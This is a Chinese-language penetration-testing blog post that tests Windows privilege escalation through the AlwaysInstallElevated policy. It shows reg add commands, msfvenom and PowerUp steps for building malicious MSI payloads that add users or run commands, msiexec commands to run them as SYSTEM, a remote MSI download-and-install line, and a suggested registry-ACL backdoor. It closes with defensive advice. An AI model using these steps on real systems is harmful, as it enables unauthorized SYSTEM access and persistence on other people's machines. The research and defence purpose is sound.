利用AlwaysInstallElevated提权的测试分析

3gstudent 技术 2019年7月22日发布
Favorite收藏

导语:利用AlwaysInstallElevated提权是一个2017年公开的技术,Metasploit和PowerUp都提供了利用方法。

0x00 前言

利用AlwaysInstallElevated提权是一个2017年公开的技术,Metasploit和PowerUp都提供了利用方法。

我在研究的过程中,发现Metasploit的利用方法存在一些不足,我遇到了和其他公开文章描述不一样的情况。

于是我做了进一步的研究,本文将要介绍我遇到的问题和解决方法。

0x01 简介

本文将要介绍以下内容:

· 常规利用方法

· 我在测试中遇到的问题

· 解决方法

· 扩展利用思路

0x02 常规利用方法

AlwaysInstallElevated是一个组策略配置,如果启用,那么将允许普通用户以SYSTEM权限运行安装文件(msi)。

启用方法:

需要修改以下两个组策略:

· Computer Configuration\Administrative Templates\Windows Components\Windows Installer

· User Configuration\Administrative Templates\Windows Components\Windows Installer

设置成Enabled,如下图:

Alt text

注:无法通过secedit.exe在命令行下修改以上两个组策略。

命令行下的启用方法:

创建以下两个注册表项:

· HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer,AlwaysInstallElevated,1

· HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer,AlwaysInstallElevated,1

cmd的命令如下:

reg add HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

利用方法:

启用AlwaysInstallElevated后,可以通过命令行调用msiexec安装msi文件,msi文件内包含要执行的Payload,Payload将会以System权限执行。

调用msiexec的命令如下:

msiexec /q /i test.msi

/i参数用来表示安装操作。

/q参数用来隐藏安装界面。

注:执行后会在%TEMP%下生成MSI的log文件。

更多关于msiexec的介绍可参考之前的文章《渗透测试中的msiexec》

0x03 开源方法测试

在测试环境启用AlwaysInstallElevated,命令如下:

reg add HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

1.PowerUp

https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

(1)测试是否启用AlwaysInstallElevated

Import-Module .\PowerUp.ps1
Get-RegistryAlwaysInstallElevated

返回True代表开启。

(2)导出msi文件

Import-Module .\PowerUp.ps1
Write-UserAddMSI

当前目录生成UserAdd.msi。

(3)命令行执行(当前用户权限)

msiexec /q /i UserAdd.msi

弹出添加用户的对话框,能够用来添加用户,如下图:

Alt text

此时查看该对话框的权限为System,如下图:

Alt text

提权成功。

2.Metasploit

生成弹出计算器的msi文件,命令如下:

msfvenom -p windows/exec CMD=calc.exe -f msi >calc.msi

命令行执行msi文件(当前用户权限):

msiexec /q /i calc.msi

弹出的计算器权限为Medium,如下图:

Alt text

这与PowerUp的结果不同。

换成其他Payload的msi文件,例如添加用户:

msfvenom -p windows/adduser USER=test [email protected] -f msi >adduser.msi

例如执行cmd命令:

msfvenom -p windows/x64/exec CMD='whoami >1.txt' -f msi > cmd.msi

由于权限不够(为Medium),均失败。

这与其他公开文章介绍的情况不一样。

个人猜测:

使用Metasploit生成的msi文件在运行时没有要求提升权限,所以导致了这个问题。

0x04 解决方法

这里可以参考PowerUp的方式生成msi文件。

直接执行PowerUp生成的UserAdd.msi,如下图:

Alt text

提示msi文件是由MSI Wrapper生成。

下面我们就尝试使用MSI Wrapper生成一个可用的Payload。

下载地址:

https://www.exemsi.com/download/

生成过程如下:

1.将Payload设置为执行ProcessHacker

配置如下图:

Alt text

2.运行时要求提升权限

配置如下图:

Alt text

注:MSI installation context下选择Per User和Per Machine都可以。

其他配置按照默认设置,生成的msi文件已上传至github,地址如下:

https://github.com/3gstudent/test/blob/master/RunProcessHacker.msi

再次测试,命令行执行msi文件(当前用户权限):

msiexec /q /i RunProcessHacker.msi

ProcessHacker以System权限执行,利用成功,如下图:

Alt text

综合以上的测试,我们可以得出结论:

使用Metasploit生成的msi文件在运行时没有要求提升权限,所以无法利用AlwaysInstallElevated提权。

我们可以使用MSI Wrapper生成可供利用的msi文件。

0x05 扩展利用思路

通常情况下,先对注册表项进行判断,如果满足条件(存在两个注册表项),就可以利用AlwaysInstallElevated提权。

扩展思路1:

如果获得了Backup service用户的权限,输入whoami /priv后,发现存在以下权限:

· SeRestorePrivilege

· SeTakeOwnershipPrivilege

此时能够对注册表进行写操作,可以创建对应的注册表项,再利用AlwaysInstallElevated提权

利用SeRestorePrivilege和SeTakeOwnershipPrivilege写注册表可参考之前的文章:《渗透技巧——Windows Token九种权限的利用》

扩展思路2:

如果已获得系统权限,可以创建一个提权后门。

对以下注册表项添加ACL,允许Everyone进行写操作:

· HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer

· HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

对注册表项添加ACL的方法可参考之前的文章:《渗透技巧——Windows下的Access Control List》

扩展思路3:

msiexec支持远程下载执行,那么能否利用AlwaysInstallElevated提权?

测试命令如下:

msiexec /q /i https://raw.githubusercontent.com/3gstudent/test/master/RunProcessHacker.msi

执行失败。

下面查找原因,显示安装过程,测试命令如下:

msiexec /i https://raw.githubusercontent.com/3gstudent/test/master/RunProcessHacker.msi

提示来源不可信,如下图:

Alt text

得出结论:

msi文件需要可信的证书才能远程利用AlwaysInstallElevated提权。

0x06 防御建议

如果没有特殊需求,禁用AlwaysInstallElevated。

监控注册表项:

· HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer

· HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

0x07 小结

本文介绍了利用AlwaysInstallElevated提权的方法,找到了使用Metasploit生成的msi文件利用失败的原因,最后介绍了如何通过MSI Wrapper生成可供利用的msi文件。

本文为 3gstudent 原创稿件,授权嘶吼独家发布,如若转载,请注明原文地址: https://www.4hou.com/technology/19286.html
点赞 0
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论